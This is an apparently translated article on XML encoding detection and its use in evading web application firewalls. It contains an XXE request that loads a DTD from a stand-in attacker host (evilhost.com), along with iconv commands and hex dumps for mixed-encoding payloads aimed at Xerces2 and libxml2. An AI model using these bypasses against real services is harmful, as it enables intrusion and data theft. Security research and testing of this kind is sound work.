
Evil XML with two encodings

WAFs see white noise instead of a document!
00000000  3C3F 786D 6C20 7665 7273 696F 6E3D 2231  <?xml version="1
00000010  2E30 2220 656E 636F 6469 6E67 3D22 5554  .0" encoding="UT
00000020  462D 3136 4245 2200 3F00 3E00 3C00 6100  F-16BE".?.>.<.a.
00000030  3E00 3100 3300 3300 3700 3C00 2F00 6100  >.1.3.3.7.<./.a.
00000040  3E                                       >
This article is a short overview of encodings in XML and of how they can be used to bypass WAFs.

Which encodings work in XML


The specification requires parsers to understand two encodings: UTF-8 and UTF-16. Many parsers support more, but these two are enough for an attack.

UTF-8 and UTF-16 represent the same characters from the Unicode table.

The encodings differ in how they store the character's code point.
UTF-8
One character takes from one to four bytes.

The code point is stored according to a pattern:
Number of bytes | Significant bits | Binary code
1 | 7 | 0xxxxxxx
2 | 11 | 110xxxxx 10xxxxxx
3 | 16 | 1110xxxx 10xxxxxx 10xxxxxx
4 | 21 | 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
Overlong encodings are not allowed: only the shortest form of a character is valid.
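The UTF-8 bit patterns can be checked with a short Python sketch. The helper name `utf8_encode` is hypothetical and exists only for illustration; the result is compared against Python's built-in codec.

```python
def utf8_encode(cp: int) -> bytes:
    """Encode one Unicode code point by hand, following the UTF-8 bit patterns."""
    if cp < 0 or cp > 0x10FFFF or 0xD800 <= cp <= 0xDFFF:
        raise ValueError("not an encodable code point")
    if cp < 0x80:          # 7 bits:  0xxxxxxx
        return bytes([cp])
    if cp < 0x800:         # 11 bits: 110xxxxx 10xxxxxx
        return bytes([0xC0 | (cp >> 6), 0x80 | (cp & 0x3F)])
    if cp < 0x10000:       # 16 bits: 1110xxxx 10xxxxxx 10xxxxxx
        return bytes([0xE0 | (cp >> 12),
                      0x80 | ((cp >> 6) & 0x3F),
                      0x80 | (cp & 0x3F)])
    # 21 bits: 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
    return bytes([0xF0 | (cp >> 18),
                  0x80 | ((cp >> 12) & 0x3F),
                  0x80 | ((cp >> 6) & 0x3F),
                  0x80 | (cp & 0x3F)])


# The hand-written encoder agrees with the built-in codec.
for cp in (0x3F, 0xE8, 0x20AC, 0x1D6E5):
    assert utf8_encode(cp) == chr(cp).encode("utf-8")
```

Because the encoder always picks the first branch that fits, it never produces an overlong form. A strict decoder rejects such forms: in Python, decoding the two-byte sequence `C0 BF` (an overlong `?`) as UTF-8 raises `UnicodeDecodeError`.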

UTF-16
One character takes two or four bytes.

The code point is stored according to a pattern:
Number of bytes | Significant bits | Binary code
2 | 16 | xxxxxxxx xxxxxxxx
4* | 20 | 110110xx xxxxxxxx 110111xx xxxxxxxx
* 0x010000 is subtracted from the code point before it is encoded.

A character written in 4 bytes is called a surrogate pair. The pair consists of two ordinary 16-bit units, but taken from the reserved range U+D800 to U+DFFF. Neither half of the pair is valid on its own.
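As a worked example of the four-byte pattern, the sketch below splits a code point into its two surrogates. The function name `surrogate_pair` is hypothetical; the character U+1D6E5 is the one used in this article's examples.

```python
def surrogate_pair(cp: int) -> tuple[int, int]:
    """Split a code point above U+FFFF into (high, low) UTF-16 surrogates."""
    if not 0x10000 <= cp <= 0x10FFFF:
        raise ValueError("only code points above U+FFFF need a surrogate pair")
    v = cp - 0x10000                 # 20 significant bits remain
    high = 0xD800 | (v >> 10)        # 110110xx xxxxxxxx: top 10 bits
    low = 0xDC00 | (v & 0x3FF)       # 110111xx xxxxxxxx: bottom 10 bits
    return high, low


high, low = surrogate_pair(0x1D6E5)
print(f"{high:04X} {low:04X}")       # D835 DEE5

# The two halves, written big-endian, match the built-in UTF-16BE codec.
assert high.to_bytes(2, "big") + low.to_bytes(2, "big") == "\U0001D6E5".encode("utf-16-be")
```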

UTF-16 comes in two variants: UTF-16BE and UTF-16LE (big-endian and little-endian). They differ in byte order.

Big-endian is the "natural" byte order, with the most significant byte first, as in Arabic numerals.
Little-endian is the reverse byte order.

Examples of characters written in UTF-16BE and UTF-16LE
Encoding | Character | Binary code
UTF-16BE | U+003F | 00000000 00111111
UTF-16LE | U+003F | 00111111 00000000
UTF-16BE* | U+1D6E5 | 11011000 00110101 11011110 11100101
UTF-16LE* | U+1D6E5 | 00110101 11011000 11100101 11011110
* In four-byte characters, each group of 2 bytes is flipped separately. This is done for backward compatibility with Unicode 1.0, where every character was exactly two bytes long.
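The byte-order examples can be reproduced with Python's built-in codecs. This is a minimal sketch; `bits` is a hypothetical helper that only formats bytes as binary.

```python
def bits(data: bytes) -> str:
    """Render bytes as space-separated 8-bit binary groups."""
    return " ".join(f"{b:08b}" for b in data)


for ch in ("\u003F", "\U0001D6E5"):
    for codec in ("utf-16-be", "utf-16-le"):
        print(f"{codec:10} U+{ord(ch):04X}  {bits(ch.encode(codec))}")
```

For the four-byte character the little-endian output swaps the bytes inside each 16-bit half, while the order of the two halves stays the same.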

How parsers determine the encoding


Parsers determine the encoding in four ways:

External encoding information
Some network protocols have a dedicated field for the encoding:

[Figure: the encoding transmitted in a WebDAV request]

Most often these are protocols built on the MIME standard, for example SMTP, HTTP, and WebDAV.
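In MIME-based protocols the encoding usually travels in the `charset` parameter of the `Content-Type` header. The sketch below extracts it with Python's standard `email` package; the function name `charset_from_content_type` and the sample header values are assumptions made for illustration, not taken from the competition traffic.

```python
from email.message import Message
from typing import Optional


def charset_from_content_type(value: str) -> Optional[str]:
    """Return the charset parameter of a Content-Type value, lower-cased, or None."""
    msg = Message()
    msg["Content-Type"] = value
    return msg.get_content_charset()


print(charset_from_content_type('text/xml; charset="UTF-16BE"'))  # utf-16be
print(charset_from_content_type("text/xml"))                      # None
```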

Byte Order Mark (BOM)

The BOM is the character with the code U+FEFF.

If the parser finds it at the start of the document, it determines the encoding from the way the BOM is written in bytes.

Popular encodings and their BOMs
Encoding | BOM | Example | Text after the BOM
UTF-8 | EF BB BF | EF BB BF 3C 3F 78 6D 6C ... | <?xml
UTF-16BE | FE FF | FE FF 00 3C 00 3F 00 78 00 6D 00 6C ... | .<.?.x.m.l
UTF-16LE | FF FE | FF FE 3C 00 3F 00 78 00 6D 00 6C 00 ... | <.?.x.m.l.
The BOM works only at the beginning of the document. In the middle, it is read as a special (zero-width) space or causes an error.
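A minimal sketch of BOM-based detection, limited to the three encodings listed in the BOM table. The function name `detect_bom` is hypothetical; a real parser also has to tell the UTF-16LE BOM apart from the UTF-32LE one, which starts with the same two bytes.

```python
import codecs
from typing import Optional

# BOM byte sequences for the three encodings covered in this article.
BOMS = [
    (codecs.BOM_UTF8, "UTF-8"),         # EF BB BF
    (codecs.BOM_UTF16_BE, "UTF-16BE"),  # FE FF
    (codecs.BOM_UTF16_LE, "UTF-16LE"),  # FF FE
]


def detect_bom(data: bytes) -> Optional[str]:
    """Return the encoding announced by a leading BOM, or None if there is none."""
    for bom, name in BOMS:
        if data.startswith(bom):
            return name
    return None


print(detect_bom(bytes.fromhex("FEFF003C003F0078006D006C")))  # UTF-16BE
print(detect_bom(b"<?xml"))                                   # None
```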

By the first characters of the document

The specification allows the parser to look at the first four bytes and determine the encoding from them:
Encoding | Document start | Text
UTF-8, ISO 646, ASCII | 3C 3F 78 6D | <?xm
UTF-16BE | 00 3C 00 3F | .<.?
UTF-16LE | 3C 00 3F 00 | <.?.
This only works for documents that start with an XML declaration.
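The first-four-bytes check can be sketched as follows. The function name `sniff_encoding` and its return strings are hypothetical, and only the three rows from the table are covered.

```python
from typing import Optional


def sniff_encoding(data: bytes) -> Optional[str]:
    """Guess the encoding family from the first four bytes of an XML document."""
    head = data[:4]
    if head == b"<?xm":            # 3C 3F 78 6D
        return "ASCII-compatible"  # UTF-8, ISO 646, ASCII, ...
    if head == b"\x00<\x00?":      # 00 3C 00 3F
        return "UTF-16BE"
    if head == b"<\x00?\x00":      # 3C 00 3F 00
        return "UTF-16LE"
    return None                    # no XML declaration at the start


print(sniff_encoding('<?xml version="1.0"?>'.encode("utf-16-be")))  # UTF-16BE
```

For the ASCII-compatible case the exact encoding is still unknown at this point, which is why the parser goes on to read the declaration.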

From the XML declaration

The encoding can be specified in the XML declaration:

<?xml version="1.0" encoding="UTF-8"?> 

An XML declaration is a line written at the very beginning of the document. It tells the parser how to read the rest of the document.

<?xml version="1.0" encoding="ISO-8859-1" ?>
<très>là </très>
The document is encoded in ISO-8859-1

It might seem that the parser must already know the encoding in order to read the declaration. In practice the declaration is useful for choosing between similar encodings, for example between ASCII-compatible ones.
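To see a declaration select between ASCII-compatible encodings, the sketch below feeds an ISO-8859-1 document to Python's standard `xml.etree.ElementTree`, which is used here only as a convenient parser and is not one of the parsers discussed in this article.

```python
import xml.etree.ElementTree as ET

# The same bytes are not valid UTF-8, so the declaration is what makes them readable.
doc = '<?xml version="1.0" encoding="ISO-8859-1"?><très>là</très>'.encode("iso-8859-1")

root = ET.fromstring(doc)   # bytes input: the parser honours the declared encoding
print(root.tag, root.text)  # très là
```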

Standard WAF bypass


The easiest option is to switch to an encoding that is incompatible with ASCII and hope that the WAF does not understand it.

This method worked at the WAF Bypass competition in 2015. There, participants had to read the flag through an XXE vulnerability:

XXE exploitation request from the competition
POST / HTTP/1.1
Host: d3rr0r1m.waf-bypass.phdays.com
Connection: close
Content-Type: text/xml
User-Agent: Mozilla/5.0
Content-Length: 166

<?xml version="1.0"?>
<!DOCTYPE root [
    <!ENTITY % xxe SYSTEM "http://evilhost.com/waf.dtd">
    %xxe;
]>
<root>
    <method>test</method>
</root>

One solution is to transcode the request body into UTF-16BE without a BOM:

 cat original.xml | iconv -f UTF-8 -t UTF-16BE > payload.xml 

The WAF saw nothing dangerous in this document and let the request through.
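Why the transcoded request slips through can be illustrated with a deliberately naive filter. Everything here is hypothetical: the signature list and `naive_waf_blocks` stand in for a byte-level matcher and do not describe the WAF used at the competition.

```python
# Byte signatures a simplistic filter might look for (an assumption for illustration).
SIGNATURES = (b"<!DOCTYPE", b"<!ENTITY", b"SYSTEM")


def naive_waf_blocks(body: bytes) -> bool:
    """Return True if any signature occurs in the raw request body."""
    return any(sig in body for sig in SIGNATURES)


original = (
    '<?xml version="1.0"?>\n'
    "<!DOCTYPE root [\n"
    '<!ENTITY % xxe SYSTEM "http://evilhost.com/waf.dtd">\n'
    "%xxe;\n"
    "]>\n"
    "<root><method>test</method></root>\n"
).encode("utf-8")

# Same transformation as: iconv -f UTF-8 -t UTF-16BE
payload = original.decode("utf-8").encode("utf-16-be")

print(naive_waf_blocks(original))  # True
print(naive_waf_blocks(payload))   # False: every ASCII byte is now preceded by 00
```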

Bypass using two encodings

Another way to confuse WAF is to encode XML in two encodings at once.

When the parser reads the encoding from the declaration, it immediately switches to it, even if that encoding is incompatible with the one in which the declaration itself is written.

If the declaration and the rest of the document are written in different encodings, a WAF that decodes the whole body with a single encoding will not be able to make sense of it.

Xerces2 Java Parser

The declaration is in ASCII, and everything after it is in UTF-16BE:
00000000  3C3F 786D 6C20 7665 7273 696F 6E3D 2231  <?xml version="1
00000010  2E30 2220 656E 636F 6469 6E67 3D22 5554  .0" encoding="UT
00000020  462D 3136 4245 223F 3E00 3C00 6100 3E00  F-16BE"?>.<.a.>.
00000030  3100 3300 3300 3700 3C00 2F00 6100 3E    1.3.3.7.<./.a.>
Commands to generate it:

echo -n '<?xml version="1.0" encoding="UTF-16BE"?>' > payload.xml
echo '<a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml

libxml2

libxml2 switches the encoding as soon as it has read the encoding attribute. Therefore, we change the encoding before the declaration is closed:
00000000  3C3F 786D 6C20 7665 7273 696F 6E3D 2231  <?xml version="1
00000010  2E30 2220 656E 636F 6469 6E67 3D22 5554  .0" encoding="UT
00000020  462D 3136 4245 2200 3F00 3E00 3C00 6100  F-16BE".?.>.<.a.
00000030  3E00 3100 3300 3300 3700 3C00 2F00 6100  >.1.3.3.7.<./.a.
00000040  3E                                       >
Commands to generate it:

echo -n '<?xml version="1.0" encoding="UTF-16BE"' > payload.xml
echo '?><a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml
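Both mixed-encoding payloads can also be built without a shell. This is a minimal Python sketch; `mixed_payload` is a hypothetical helper, and unlike `echo` it does not append a trailing newline, so the output matches the hex dumps byte for byte.

```python
def mixed_payload(ascii_part: str, utf16_part: str) -> bytes:
    """Concatenate an ASCII-encoded prefix with a UTF-16BE-encoded remainder."""
    return ascii_part.encode("ascii") + utf16_part.encode("utf-16-be")


# Xerces2 variant: the whole declaration is ASCII, the body is UTF-16BE.
xerces = mixed_payload('<?xml version="1.0" encoding="UTF-16BE"?>', "<a>1337</a>")

# libxml2 variant: the switch happens right after the encoding attribute,
# so the closing "?>" is already written in UTF-16BE.
libxml2 = mixed_payload('<?xml version="1.0" encoding="UTF-16BE"', "?><a>1337</a>")

print(xerces.hex(" ", 2))
print(libxml2.hex(" ", 2))

with open("payload.xml", "wb") as f:
    f.write(libxml2)
```

Whether a given parser accepts such a document depends on its version and configuration, so the payload should be tested against the actual target.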

Happy pentesting!

Source: https://habr.com/ru/post/340000/

